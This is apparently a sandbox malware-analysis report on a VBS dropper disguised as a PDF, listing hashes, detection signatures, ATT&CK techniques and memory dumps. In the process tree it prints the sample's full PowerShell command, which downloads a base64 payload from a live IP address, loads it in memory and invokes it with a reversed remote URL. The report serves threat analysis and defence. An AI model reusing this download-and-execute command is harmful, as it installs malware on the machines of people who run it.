9c3b123bf5be1332f7b3727c8f6c352887437b5329ffc083d0b65833cfe5678c

Analysis

max time kernel
41s
max time network
45s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
30-09-2022 14:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

URFT06GSBAWRP_001_PDF/RQK02HVBPO_002_PDF.vbs
Size

219KB
MD5

86d9cdbe85e0b345c00063cb59efda75
SHA1

6990625fff03cdc505a7c9a224c39fb9c1b1ab80
SHA256

541752eae29c171bb8ab3f5851b6f58ba58035298b8781990998d22cd4982f6e
SHA512

0f39d5b741cb5fc822f17306537a4659c5ff191f18ef47e18aa3f604eb9d4598f1c01316068285531916a57bd0410b27fd8d44adb3bda41ee691098cd5b1bc2f
SSDEEP

48:DVK0hbQvuivLvyvTxYvsvuiv7vu2vJR2vFvvvfv1KvFvDv2UfHvrvUvgYvc2vGgu:xKWdUIlVc8WGvXimF

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://20.7.14.99/dll/dll_ink.pdf

Signatures

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

3 1728 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

powershell.exe

pid process

1728 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 1728 powershell.exe

flow	pid	process
3	1728	powershell.exe

pid	process
1728	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1728	powershell.exe

Suspicious use of WriteProcessMemory 3 IoCs

Processes:

WScript.exe

description	pid	process	target process
PID 1832 wrote to memory of 1728	1832	WScript.exe	powershell.exe
PID 1832 wrote to memory of 1728	1832	WScript.exe	powershell.exe
PID 1832 wrote to memory of 1728	1832	WScript.exe	powershell.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\URFT06GSBAWRP_001_PDF\RQK02HVBPO_002_PDF.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('9a82ea0d2fb5-1179-4854-75ce-8a89ca37=nekot&aidem=tla?txt.cnysay/o/moc.topsppa.483ca-dpoj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/1728-55-0x0000000000000000-mapping.dmp

Download
memory/1728-57-0x000007FEF4940000-0x000007FEF5363000-memory.dmp

Filesize
10.1MB

Download
memory/1728-58-0x000007FEF3DE0000-0x000007FEF493D000-memory.dmp

Filesize
11.4MB

Download
memory/1728-59-0x0000000002414000-0x0000000002417000-memory.dmp

Filesize
12KB

Download
memory/1728-60-0x000000000241B000-0x000000000243A000-memory.dmp

Filesize
124KB

Download
memory/1728-61-0x0000000002414000-0x0000000002417000-memory.dmp

Filesize
12KB

Download
memory/1728-62-0x000000000241B000-0x000000000243A000-memory.dmp

Filesize
124KB

Download
memory/1832-54-0x000007FEFC341000-0x000007FEFC343000-memory.dmp

Filesize
8KB

Download